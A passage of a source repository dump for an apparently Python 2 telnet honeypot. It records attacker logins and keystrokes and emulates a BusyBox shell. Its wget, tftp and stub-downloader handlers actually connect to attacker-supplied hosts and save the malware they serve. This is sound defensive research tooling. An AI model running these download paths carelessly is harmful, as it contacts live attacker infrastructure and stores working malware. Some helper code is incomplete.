optional=not(self.log_samples))\n\t\n\t\tself.urlset = {}\n\t\t\n\t\tself.ip = None\n\t\tself.user = None\n\t\tself.password = None\n\t\tself.date = None\n\t\tself.urls = []\n\t\tself.stream = []\n\t\t\n\tdef log_raw(self, obj):\n\t\tif self.logfile != None:\n\t\t\twith open(self.logfile, \"ab\") as fp:\n\t\t\t\tfp.write(json.dumps(obj).replace(\"\\n\", \"\") + \"\\n\")\n\t\t\n\t\t\n\tdef json(self):\n\t\treturn {\n\t\t\t\"type\"          : \"connection\",\n\t\t\t\"ip\"            : self.ip,\n\t\t\t\"user\"          : self.user,\n\t\t\t\"pass\"          : self.password,\n\t\t\t\"date\"          : self.date,\n\t\t\t\"stream\"        : self.stream,\n\t\t\t\"samples\"       : map(lambda sample: sample.json(), self.urls),\n\t\t}\n\n\tdef addInput(self, text):\n\t\tself.stream.append({\n\t\t\t\"in\":   True,\n\t\t\t\"ts\":   round((time.time() - self.date) * 1000) / 1000,\n\t\t\t\"data\": text.decode('ascii', 'ignore')\n\t\t})\n\n\tdef addOutput(self, text):\n\t\tself.stream.append({\n\t\t\t\"in\":   False,\n\t\t\t\"ts\":   round((time.time() - self.date) * 1000) / 1000,\n\t\t\t\"data\": text.decode('ascii', 'ignore')\n\t\t})\n\n\tdef set_login(self, ip, user, password):\n\t\tself.ip       = ip\n\t\tself.user     = user\n\t\tself.password = password\n\t\tself.date     = int(time.time())\n\t\n\tdef add_file(self, data, url=None, name=None, info=None):\n\t\tif url == None:\n\t\t\tshahash = sha256(data)\n\t\t\t# Hack, must be unique somehow, so just use the hash ...\"\n\t\t\turl = \"telnet://\" + self.ip + \"/\" + shahash[0:8]\n\t\tif name == None:\n\t\t\tname = url.split(\"/\")[-1].strip()\n\n\t\tsample = SampleRecord(url, name, info, data)\n\t\tself.urlset[url] = sample\n\t\tself.urls.append(sample)\n\n\tdef commit(self):\n\t\tself.log_raw(self.json())\n\n\t\tif self.log_samples:\n\t\t\tfor sample in self.urls:\n\t\t\t\tif sample.data:\n\t\t\t\t\tfp = open(self.sample_dir + \"/\" + sample.sha256, \"wb\")\n\t\t\t\t\tfp.write(sample.data)\n\t\t\t\t\tfp.close()\n\t\n\t\t# Ignore connections without any input\n\t\tif len(self.stream) > 1 and self.back != None:\n\t\t\tupload_req = self.back.put_session(self.json())\n\n\n"
  },
  {
    "path": "honeypot/session.py",
    "content": "import re\nimport random\nimport time\nimport json\nimport traceback\n\nimport struct\nimport socket\nimport select\nimport errno\n\nfrom util.dbg    import dbg\nfrom util.config import config\n\nfrom sampledb_client import SessionRecord\n\nfrom shell.shell import Env, run\n\nMIN_FILE_SIZE = 128\nPROMPT = \" # \"\n\t\t\t\nclass Session:\n\tdef __init__(self, output, remote_addr):\n\t\tdbg(\"New Session\")\n\t\tself.output      = output\n\t\t\n\t\tself.remote_addr = remote_addr\n\t\tself.record      = SessionRecord()\n\t\tself.env         = Env(self.send_string)\n\n\t\tself.env.listen(\"download\", self.download)\n\n\t\t# Files already commited\n\t\tself.files = []\n\n\tdef login(self, user, password):\n\t\tdbg(\"Session login: user=\" + user + \" password=\" + password)\n\t\tself.record.set_login(self.remote_addr, user, password)\n\t\t\n\t\tself.send_string(PROMPT)\n\n\tdef download(self, data):\n\t\tpath = data[\"path\"]\n\t\turl  = data[\"url\"]\n\t\tinfo = data[\"info\"]\n\t\tdata = data[\"data\"]\n\n\t\tdbg(\"Downloaded \" + url + \" to \" + path)\n\n\t\tif data:\n\t\t\tself.record.add_file(data, url=url, name=path, info=info)\n\t\t\tself.files.append(path)\n\t\telse:\n\t\t\tself.record.add_file(None, url=url, name=path, info=info)\n\t\t\t\n\tdef found_file(self, path, data):\n\t\tif path in self.files:\n\t\t\tpass\n\t\telse:\n\t\t\tif len(data) > MIN_FILE_SIZE:\n\t\t\t\tdbg(\"File created: \" + path)\n\t\t\t\tself.record.add_file(data, name=path)\n\t\t\telse:\n\t\t\t\tdbg(\"Ignore small file: \" + path + \" (\" + str(len(data)) + \") bytes\")\n\t\t\n\n\tdef end(self):\n\t\tdbg(\"Session End\")\n\t\n\t\tfor path in self.env.files:\n\t\t\tself.found_file(path, self.env.files[path])\n\t\t\t\n\t\tfor (path, data) in self.env.deleted:\n\t\t\tself.found_file(path, data)\n\t\n\t\tself.record.commit()\n\n\tdef send_string(self, text):\n\t\tself.record.addOutput(text)\n\t\tself.output(text)\n\n\tdef shell(self, l):\n\t\tself.record.addInput(l + \"\\n\")\n\t\n\t\ttry:\n\t\t\ttree = run(l, self.env)\n\t\texcept:\n\t\t\tdbg(\"Could not parse \\\"\"+l+\"\\\"\")\n\t\t\tself.send_string(\"sh: syntax error near unexpected token `\" + \" \" + \"'\\n\")\n\t\t\ttraceback.print_exc()\n\t\t\n\t\tself.send_string(PROMPT)\n\n"
  },
  {
    "path": "honeypot/shell/__init__.py",
    "content": ""
  },
  {
    "path": "honeypot/shell/commands/__init__.py",
    "content": ""
  },
  {
    "path": "honeypot/shell/commands/base.py",
    "content": "import sys\nimport traceback\n\nfrom binary import run_binary\n\nclass Proc:\n    procs = {}\n\n    @staticmethod\n    def register(name, obj):\n        Proc.procs[name] = obj\n\n    @staticmethod\n    def get(name):\n        if name in Proc.procs:\n            return Proc.procs[name]\n        else:\n            return None\n\nclass StaticProc(Proc):\n    def __init__(self, output, result=0):\n        self.output = output\n        self.result = result\n\n    def run(self, env, args):\n        env.write(self.output)\n        return self.result\n\nclass FuncProc(Proc):\n    def __init__(self, func):\n        self.func = func\n\n    def run(self, env, args):\n        env.write(self.func(args))\n        return 0\n\n# Basic Procs\n\nclass Exec(Proc):\n\n    def run(self, env, args):\n        if len(args) == 0:\n            return 0\n        \n        if args[0][0] == \">\":\n            name = \"true\"\n        elif args[0].startswith(\"./\"):\n            fname = args[0][2:]\n            fdata = env.readFile(fname)\n            \n            if fdata == None:\n                env.write(\"sh: 1: ./\" + fname + \": not found\\n\")\n                return 1\n            else:\n                run_binary(fdata, fname, args[1:], env)\n                return 0\n        else:\n            name = args[0]\n            args = args[1:]\n\n        # $path = /bin/\n        if name.startswith(\"/bin/\"):\n            name = name[5:]\n\n        if Proc.get(name):\n            try:\n                return Proc.get(name).run(env, args)\n            except:\n                traceback.print_exc()\n                env.write(\"Segmention fault\\n\")\n                return 1\n        else:\n            env.write(name + \": command not found\\n\")\n            return 1\n\nclass BusyBox(Proc):\n\n    def run(self, env, args):\n        \n        if len(args) == 0:\n            env.write(\"\"\"BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3) multi-call binary.\nBusyBox is copyrighted by many authors between 1998-2015.\nLicensed under GPLv2. See source distribution for detailed\ncopyright notices.\n\nUsage: busybox [function [arguments]...]\n\nCurrently defined functions:\n    \"\"\" + \" \".join(Proc.procs.keys()) + \"\\n\\n\")\n            return 0\n\n        name = args[0]\n        args = args[1:]\n        if Proc.get(name):\n            return Proc.get(name).run(env, args)\n        else:\n            env.write(name + \": applet not found\\n\")\n            return 1\n\nclass Cat(Proc):\n    \n    def run(self, env, args):\n        fname = args[0]\n        string = env.readFile(fname)\n        if string != None:\n            env.write(string)\n            return 0\n        else:\n            env.write(\"cat: \" + fname + \": No such file or directory\\n\")\n            return 1\n\nclass Echo(Proc):\n\n    def run(self, env, args):\n        opts = \"\"\n        if args[0][0] == \"-\":\n            opts = args[0][1:]\n            args = args[1:]\n\n        string = \" \".join(args)\n        if \"e\" in opts:\n            string = string.decode('string_escape')\n\n        env.write(string)\n\n        if not(\"n\" in opts):\n            env.write(\"\\n\")\n\n        return 0\n\nclass Rm(Proc):\n\n    def run(self, env, args):\n        if args[0] in env.listfiles():\n            env.deleteFile(args[0])\n            return 0\n        else:\n            env.write(\"rm: cannot remove '\" + args[0] + \"': No such file or directory\\n\")\n            return 1\n\nclass Ls(Proc):\n\n    def run(self, env, args):\n        for f in env.listfiles().keys():\n            env.write(f + \"\\n\")\n        return 0\n\nclass Dd(Proc):\n\n    def run(self, env, args):\n        infile  = None\n        outfile = None\n        count   = None\n        bs      = 512\n        for a in args:\n            if a.startswith(\"if=\"):\n                infile = a[3:]\n            if a.startswith(\"of=\"):\n                outfile = a[3:]\n            if a.startswith(\"count=\"):\n                count = int(a[6:])\n            if a.startswith(\"bs=\"):\n                bs = int(a[3:])\n        \n        if infile != None:\n            data = env.readFile(infile)\n            if count != None:\n                data = data[0:(count*bs)]\n            if outfile:\n                env.deleteFile(infile)\n                env.writeFile(infile, data)\n            else:\n                env.write(data)\n\n        env.write(\"\"\"0+0 records in\n0+0 records out\n0 bytes copied, 0 s, 0,0 kB/s\\n\"\"\")\n        return 0\n\nclass Cp(Proc):\n\n    def run(self, env, args):\n        infile  = args[0]\n        outfile = args[1]\n        \n        data = env.readFile(infile)\n        if data != None:\n            env.writeFile(outfile, data)\n            return 0\n        else:\n            env.write(\"cp: cannot stat '\" + infile + \"': No such file or directory\\n\")\n            return 1\n\nProc.register(\"cp\",      Cp())\nProc.register(\"ls\",      Ls())\nProc.register(\"cat\",     Cat())\nProc.register(\"dd\",      Dd())\nProc.register(\"rm\",      Rm())\nProc.register(\"echo\",    Echo())\nProc.register(\"busybox\", BusyBox())\nProc.register(\"exec\",    Exec())\n\nProc.register(\"cd\",      StaticProc(\"\"))\nProc.register(\"true\",    StaticProc(\"\"))\nProc.register(\"chmod\",   StaticProc(\"\"))\nProc.register(\"uname\",   StaticProc(\"\"))\nProc.register(\":\",       StaticProc(\"\"))\nProc.register(\"ps\",      StaticProc(\n\"\"\"  PID TTY          TIME CMD\n 6467 pts/0    00:00:00 sh\n12013 pts/0    00:00:00 ps\\n\"\"\"))\n\n# Other files\n\nfrom wget  import Wget\nfrom shell import Shell\n\n# tftp disabled\n#from tftp import Tftp\n\n\n"
  },
  {
    "path": "honeypot/shell/commands/binary.py",
    "content": "\nimport socket\nimport struct\nimport select\n\ndef dbg(s):\n    print s\n\ndef run_binary(data, fname, args, env):\n    dbg(\"Parsing binary file \" + fname + \" (\" + str(len(data)) + \" bytes)\")\n    \n    socks  = []\n    tuples = []\n    pos    = 0\n    while True:\n        pos = data.find(\"\\x02\\x00\", pos)\n        if pos == -1: break\n        \n        sockaddr = data[pos:pos+8]\n        sockaddr = struct.unpack(\">HHBBBB\", sockaddr)\n        pos += 8\n        \n        # Ignore ip addresses starting with 0 or > 224 (multicast)\n        if (sockaddr[2] == 0 or sockaddr[2] >= 224):\n            continue\n        \n        ip   = str(sockaddr[2]) + \".\" + str(sockaddr[3]) + \".\" + str(sockaddr[4]) + \".\" + str(sockaddr[5])\n        port = sockaddr[1]\n        tuples.append((ip, port))\n\n    for addr in tuples:\n        try:\n            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            s.settimeout(15)\n            s.setblocking(0)\n            s.connect_ex(addr)\n            socks.append(s)\n            dbg(\"Trying tcp://\" + addr[0] + \":\" + str(addr[1]))\n        except:\n            pass\n    \n    goodsocket = None\n    data       = None\n    url        = None\n    while len(socks) > 0:\n        read, a, b = select.select(socks, [], [], 15)\n        if len(read) == 0: break\n        for s in read:\n            if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:\n                try:\n                    s.setblocking(1)\n                    data = s.recv(1024)\n                    goodsocket = s\n                    peer = s.getpeername()\n                    url  = \"tcp://\" + peer[0] + \":\" + str(peer[1])\n                    dbg(\"Connected to \" + url)\n                    break\n                except:\n                    s.close()\n                    socks.remove(s)\n            else:\n                s.close()\n                socks.remove(s)\n        if goodsocket != None:\n            break\n\n    for s in socks:\n        if s != goodsocket:\n            s.close()\n    \n    if goodsocket == None:\n        dbg(\"Could not connect.\\n\")\n        #for addr in tuples:\n        #    env.write(tuples[0] + \":\" + tuples[1] + \"\\n\")\n        return 1\n\n    while True:\n        r = goodsocket.recv(1024)\n        if r != \"\":\n            data += r\n        else:\n            break\n    \n    goodsocket.close()\n    \n    # Normally these stub downloaders will output to stdout\n    env.write(data)\n    \n    env.action(\"download\", {\n        \"url\":  url,\n        \"path\": \"(stdout)\",\n        \"info\": \"\",\n        \"data\": data\n    })\n    \n    return 0\n"
  },
  {
    "path": "honeypot/shell/commands/cmd_util.py",
    "content": "from getopt import gnu_getopt, GetoptError\n\ndef easy_getopt(args, opt, longopts=[]):\n\toptlist, args = gnu_getopt(args, opt, longopts)\n\toptdict = {}\n\t\n\tfor item in optlist:\n\t\toptdict[item[0]] = item[1]\n\t\t\n\treturn optdict, args\n\n"
  },
  {
    "path": "honeypot/shell/commands/shell.py",
    "content": "from base import Proc\n\nclass Shell(Proc):\n    \n    def run(self, env, args):\n        from honeypot.shell.shell import run\n        \n        if len(args) == 0:\n            env.write(\"Busybox built-in shell (ash)\\n\")\n            return 0\n        \n        fname = args[0]\n        contents = env.readFile(fname)\n        \n        if contents == None:\n            env.write(\"sh: 0: Can't open \" + fname)\n            return 1\n        else:\n            shell = Proc.get(\"exec\")\n            for line in contents.split(\"\\n\"):\n                line = line.strip()\n                line = line.split(\"#\")[0]\n                run(line, env)\n            return 0\n\nProc.register(\"sh\", Shell())\n"
  },
  {
    "path": "honeypot/shell/commands/shellcode.py",
    "content": "\nfrom base     import Proc\n\nclass Shellcode():\n\n\tdef run(self, data):\n\t\tdbg(\"Parsing stub downloader (\" + str(len(data)) + \" bytes)\")\n\n\t\tsocks  = []\n\t\ttuples = []\n\t\tpos    = 0\n\t\twhile True:\n\t\t\tpos = data.find(\"\\x02\\x00\", pos)\n\t\t\tif pos == -1: break\n\t\t\t\n\t\t\tsockaddr = data[pos:pos+8]\n\t\t\tsockaddr = struct.unpack(\">HHBBBB\", sockaddr)\n\t\t\t\n\t\t\tip   = str(sockaddr[2]) + \".\" + str(sockaddr[3]) + \".\" + str(sockaddr[4]) + \".\" + str(sockaddr[5])\n\t\t\tport = sockaddr[1]\t\t\n\t\t\ttuples.append((ip, port))\n\t\t\tpos += 8\n\n\t\tfor addr in tuples:\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\t\ts.settimeout(15)\n\t\t\t\ts.setblocking(0)\n\t\t\t\ts.connect_ex(addr)\n\t\t\t\tsocks.append(s)\n\t\t\t\tdbg(\"Trying tcp://\" + addr[0] + \":\" + str(addr[1]))\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\n\t\tgoodsocket = None\n\t\tdata       = None\n\t\turl        = None\n\t\twhile len(socks) > 0:\n\t\t\tread, a, b = select.select(socks, [], [], 15)\n\t\t\tif len(read) == 0: break\n\t\t\tfor s in read:\n\t\t\t\tif s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ts.setblocking(1)\n\t\t\t\t\t\tdata = s.recv(1024)\n\t\t\t\t\t\tgoodsocket = s\n\t\t\t\t\t\tpeer = s.getpeername()\n\t\t\t\t\t\turl  = \"tcp://\" + peer[0] + \":\" + str(peer[1])\n\t\t\t\t\t\tdbg(\"Connected to \" + url)\n\t\t\t\t\t\tbreak\n\t\t\t\t\texcept:\n\t\t\t\t\t\ts.close()\n\t\t\t\t\t\tsocks.remove(s)\n\t\t\t\telse:\n\t\t\t\t\ts.close()\n\t\t\t\t\tsocks.remove(s)\n\t\t\tif goodsocket != None:\n\t\t\t\tbreak\n\n\t\tfor s in socks:\n\t\t\tif s != goodsocket:\n\t\t\t\ts.close()\n\t\t\n\t\tif goodsocket == None:\n\t\t\tdbg(\"Could not connect to any addresses in binary.\")\n\t\t\treturn\n\n\t\twhile True:\n\t\t\tr = goodsocket.recv(1024)\n\t\t\tif r != \"\":\n\t\t\t\tdata += r\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\n\t\tgoodsocket.close()\n\t\tself.record.add_file(data, url=url)\n"
  },
  {
    "path": "honeypot/shell/commands/tftp.py",
    "content": "#!/usr/bin/env python\n\nimport io\nimport traceback\n\nfrom getopt import gnu_getopt, GetoptError\nfrom tftpy  import TftpClient\n\nfrom cmd_util import easy_getopt\nfrom base     import Proc\n\nfrom util.config import config\n\nclass DummyIO(io.RawIOBase):\n\t\n\tdef __init__(self):\n\t\tself.data = \"\"\n\t\t\n\tdef write(self, s):\n\t\tself.data += s\n\t\t\nclass StaticTftp(Proc):\n\n\tdef run(self, env, args):\n\t\tTftp().run(env, args)\t\n\nclass Tftp:\n\n\thelp = \"\"\"BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) multi-call binary.\n\nUsage: tftp [OPTIONS] HOST [PORT]\n\nTransfer a file from/to tftp server\n\n\t-l FILE\tLocal FILE\n\t-r FILE\tRemote FILE\n\t-g\tGet file\n\t-p\tPut file\n\t-b SIZE\tTransfer blocks of SIZE octets\n\n\"\"\"\n\n\tdef run(self, env, args):\n\t\tself.env       = env\n\t\tself.connected = False\n\t\tself.chunks    = 0\n\t\n\t\ttry:\n\t\t\topts, args = easy_getopt(args, \"l:r:gpb:\")\n\t\texcept GetoptError as e:\n\t\t\tenv.write(\"tftp: \" + str(e) + \"\\n\")\n\t\t\tenv.write(Tftp.help)\n\t\t\treturn\n\t\t\n\t\tif len(args) == 0:\n\t\t\tenv.write(Tftp.help)\n\t\t\treturn\n\t\telif len(args) == 1:\n\t\t\thost = args[0]\n\t\t\tport = 69\n\t\t\t\n\t\t\tif \":\" in host:\n\t\t\t\tparts = host.split(\":\")\n\t\t\t\thost  = parts[0]\n\t\t\t\tport  = int(parts[1])\n\t\t\t\n\t\telse:\n\t\t\thost = args[0]\n\t\t\tport = int(args[1])\n\t\t\t\n\t\tif \"-p\" in opts:\n\t\t\tenv.write(\"tftp: option 'p' not implemented\\n\")\n\t\t\treturn\n\t\tif \"-b\" in opts:\n\t\t\tenv.write(\"tftp: option 'b' not implemented\\n\")\n\t\t\treturn\n\t\t\n\t\tif \"-r\" in opts:\n\t\t\tpath = opts[\"-r\"]\n\t\telse:\n\t\t\tprint Tftp.help\n\t\t\treturn\n\t\t\t\n\t\tif \"-l\" in opts:\n\t\t\tfname = opts[\"-l\"]\n\t\telse:\n\t\t\tfname = path\n\t\t\n\t\ttry:\n\t\t\tdata = self.download(host, port, path)\n\t\t\tenv.writeFile(fname, data)\n\n\t\t\tenv.action(\"download\", {\n\t\t\t\t\"url\":  \"tftp://\" + host + \":\" + str(port) + \"/\" + path,\n\t\t\t\t\"path\": fname,\n\t\t\t\t\"info\": None,\n\t\t\t\t\"data\": data\n\t\t\t})\n\t\t\t\n\t\t\tself.env.write(\"\\nFinished. Saved to \" + fname + \".\\n\")\n\t\texcept:\n\t\t\tenv.write(\"tftp: timeout\\n\")\n\t\t\tenv.action(\"download\", {\n\t\t\t\t\"url\":  \"tftp://\" + host + \":\" + str(port) + \"/\" + path,\n\t\t\t\t\"path\": fname,\n\t\t\t\t\"info\": None,\n\t\t\t\t\"data\": None\n\t\t\t})\n\n\tdef download(self, host, port, fname):\n\t\tif config.get(\"fake_dl\", optional=True, default=False):\n\t\t\treturn str(hash(host + str(port) + fname))\n\t\t\t\n\t\toutput = DummyIO()\n\t\tclient = TftpClient(host, port)\n\t\t\n\t\tself.env.write(\"Trying \" + host + \":\" + str(port) + \" ... \")\n\t\tclient.download(fname, output, timeout=5, packethook=self.pkt)\n\t\treturn output.data\n\t\t\n\tdef pkt(self, data):\n\t\tif not(self.connected):\n\t\t\tself.env.write(\"OK\\n\")\n\t\t\tself.connected = True\n\t\t#if self.chunks % 60 == 0:\n\t\t#\tself.env.write(\"\\n\")\n\t\tself.chunks += 1\n\t\t#self.env.write(\".\")\n\nProc.register(\"tftp\", StaticTftp())\n\n"
  },
  {
    "path": "honeypot/shell/commands/wget.py",
    "content": "\nimport requests\nimport traceback\nimport datetime\nimport urlparse\n\nfrom util.config import config\n\nfrom base     import Proc\n\nclass Wget(Proc):\n\n\tdef dl(self, env, url, path=None, echo=True):\n\t\tu = urlparse.urlparse(url)\n\t\t\n\t\thost  = u.hostname\n\t\tip    = \"127.0.0.1\"\n\t\tport  = u.port if u.port else 80\n\t\tdate  = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\t\tif echo:\n\t\t    env.write(\"--\"+date+\"--  \" + url + \"\\n\")\n\t\t    env.write(\"Resolving \" + host + \" (\" + host + \")... \" + ip + \"\\n\")\n\t\t    env.write(\"Connecting to  \" + host + \" (\" + host + \")|\" + ip + \"|:\" + str(port) + \"...\")\n\t\t    \n\t\tif path == None:\n\t\t\tpath = url.split(\"/\")[-1].strip()\n\t\tif path == \"\":\n\t\t\tpath = \"index.html\"\n\n\t\tif config.get(\"fake_dl\", optional=True, default=False):\n\t\t\tdata = str(hash(url))\n\t\t\tinfo = \"\"\n\t\telse:\n\t\t\thdr = { \"User-Agent\" : \"Wget/1.15 (linux-gnu)\" }\n\t\t\tr   = None\n\t\t\ttry:\n\t\t\t\tr = requests.get(url, stream=True, timeout=5.0, headers=hdr)\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" connected\\n\")\n\t\t\t\t\tenv.write(\"HTTP request sent, awaiting response... 200 OK\\n\")\n\t\t\t\t\tenv.write(\"Length: unspecified [text/html]\\n\")\n\t\t\t\t\tenv.write(\"Saving to: '\"+path+\"'\\n\\n\")\n\t\t\t\t\tenv.write(\"     0K .......... 7,18M=0,001s\\n\\n\")\n\t\t\t\t\tenv.write(date+\" (7,18 MB/s) - '\"+path+\"' saved [11213]\\n\")\n\n\t\t\t\tdata = \"\"\n\t\t\t\tfor chunk in r.iter_content(chunk_size = 4096):\n\t\t\t\t\tdata = data + chunk\n\n\t\t\t\tinfo = \"\"\n\t\t\t\tfor his in r.history:\n\t\t\t\t\tinfo = info + \"HTTP \" + str(his.status_code) + \"\\n\"\n\t\t\t\t\tfor k,v in his.headers.iteritems():\n\t\t\t\t\t\tinfo = info + k + \": \" + v + \"\\n\"\n\t\t\t\t\t\tinfo = info + \"\\n\"\n\n\t\t\t\tinfo = info + \"HTTP \" + str(r.status_code) + \"\\n\"\n\t\t\t\tfor k,v in r.headers.iteritems():\n\t\t\t\t\tinfo = info + k + \": \" + v + \"\\n\"\n\t\t\texcept requests.ConnectTimeout as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: Connection timed out.\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\texcept requests.ConnectionError as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: Connection refused.\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\texcept requests.ReadTimeout as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: Read timeout.\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\texcept Exception as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: \" + str(e.message) + \".\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\t\t\n\n\t\tif data:\n\t\t\tenv.writeFile(path, data)\n\t\t\n\t\tenv.action(\"download\", {\n\t\t    \"url\":  url,\n\t\t    \"path\": path,\n\t\t    \"info\": info,\n\t\t    \"data\": data\n\t\t})\n\n\tdef run(self, env, args):\n\t\tif len(args) == 0:\n\t\t    env.write(\"\"\"BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary.\n\nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]\n\t[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]\n\t[-U|--user-agent AGENT] URL...\n\nRetrieve files via HTTP or FTP\n\n\t-s\tSpider mode - only check file existence\n\t-c\tContinue retrieval of aborted transfer\n\t-q\tQuiet\n\t-P DIR\tSave to DIR (default .)\n\t-O FILE\tSave to FILE ('-' for stdout)\n\t-U STR\tUse STR for User-Agent header\n\t-Y\tUse proxy ('on' or 'off')\n\n\"\"\")\n\t\t    return 1\n\t\telse:\n\t\t    echo = True\n\t\t    for arg in args:\n\t\t        if arg == \"-O\":\n\t\t            echo = False\n\t\t    for url in args:\n\t\t        if url.startswith(\"http\"):\n\t\t            self.dl(env, url, echo=echo)\n\t\t    return 0\n\nProc.register(\"wget\", Wget())\n"
  },
  {
    "path": "honeypot/shell/grammar.peg",
    "content": "grammar cmd\n\ncmd        <- cmdlist / empty\ncmdlist    <- cmdsingle (sep (\";\" / \"&\") sep cmdlist)?                                           %make_list\ncmdsingle  <- cmdpipe  (sep (\"||\" / \"&&\") sep cmdsingle)?                                        %make_single\ncmdpipe    <- cmdredir  (sep (\"|\" !\"|\") sep cmdpipe)?                                            %make_pipe\ncmdredir   <- cmdargs ( sep (\">>-\" / \">>\" / \"<<\" / \"<>\" / \"<&\" / \">&\" / \"<\" / \">\") sep arg )*    %make_redir\ncmdargs    <- cmdbrac / args \ncmdbrac    <- \"(\" sep cmd sep \")\"                                                                %make_cmdbrac\nargs       <- arg (\" \"+ arg)*                                                                    %make_args\n\narg        <-  arg_quot1 / arg_quot2 / arg_noquot / empty\narg_noempty <-  arg_quot1 / arg_quot2 / arg_noquot\narg_quot1  <-  \"'\" [^']* \"'\"                                  %make_arg_quot\narg_quot2  <-  '\"' [^\"]* '\"'                                  %make_arg_quot\narg_noquot <-  [^ ;|&()\"'><]+                                 %make_arg_noquot\n\nempty      <-  \"\"?\nsep        <- \" \"*\n"
  },
  {
    "path": "honeypot/shell/grammar.py",
    "content": "from collections import defaultdict\nimport re\n\n\nclass TreeNode(object):\n    def __init__(self, text, offset, elements=None):\n        self.text = text\n        self.offset = offset\n        self.elements = elements or []\n\n    def __iter__(self):\n        for el in self.elements:\n            yield el\n\n\nclass TreeNode1(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode1, self).__init__(text, offset, elements)\n        self.cmdsingle = elements[0]\n\n\nclass TreeNode2(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode2, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.cmdlist = elements[3]\n\n\nclass TreeNode3(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode3, self).__init__(text, offset, elements)\n        self.cmdpipe = elements[0]\n\n\nclass TreeNode4(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode4, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.cmdsingle = elements[3]\n\n\nclass TreeNode5(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode5, self).__init__(text, offset, elements)\n        self.cmdredir = elements[0]\n\n\nclass TreeNode6(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode6, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.cmdpipe = elements[3]\n\n\nclass TreeNode7(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode7, self).__init__(text, offset, elements)\n        self.cmdargs = elements[0]\n\n\nclass TreeNode8(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode8, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.arg = elements[3]\n\n\nclass TreeNode9(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode9, self).__init__(text, offset, elements)\n        self.sep = elements[3]\n        self.cmd = elements[2]\n\n\nclass TreeNode10(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode10, self).__init__(text, offset, elements)\n        self.arg = elements[0]\n\n\nclass TreeNode11(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode11, self).__init__(text, offset, elements)\n        self.arg = elements[1]\n\n\nclass ParseError(SyntaxError):\n    pass\n\n\nFAILURE = object()\n\n\nclass Grammar(object):\n    REGEX_1 = re.compile('^[^\\']')\n    REGEX_2 = re.compile('^[^\"]')\n    REGEX_3 = re.compile('^[^ ;|&()\"\\'><]')\n\n    def _read_cmd(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmd'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_cmdlist()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_empty()\n            if address0 is FAILURE:\n                self._offset = index1\n        self._cache['cmd'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdlist(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdlist'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_cmdsingle()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            index2 = self._offset\n            index3, elements1 = self._offset, []\n            address3 = FAILURE\n            address3 = self._read_sep()\n            if address3 is not FAILURE:\n                elements1.append(address3)\n                address4 = FAILURE\n                index4 = self._offset\n                chunk0 = None\n                if self._offset < self._input_size:\n                    chunk0 = self._input[self._offset:self._offset + 1]\n                if chunk0 == ';':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\";\"')\n                if address4 is FAILURE:\n                    self._offset = index4\n                    chunk1 = None\n                    if self._offset < self._input_size:\n                        chunk1 = self._input[self._offset:self._offset + 1]\n                    if chunk1 == '&':\n                        address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                        self._offset = self._offset + 1\n                    else:\n                        address4 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure 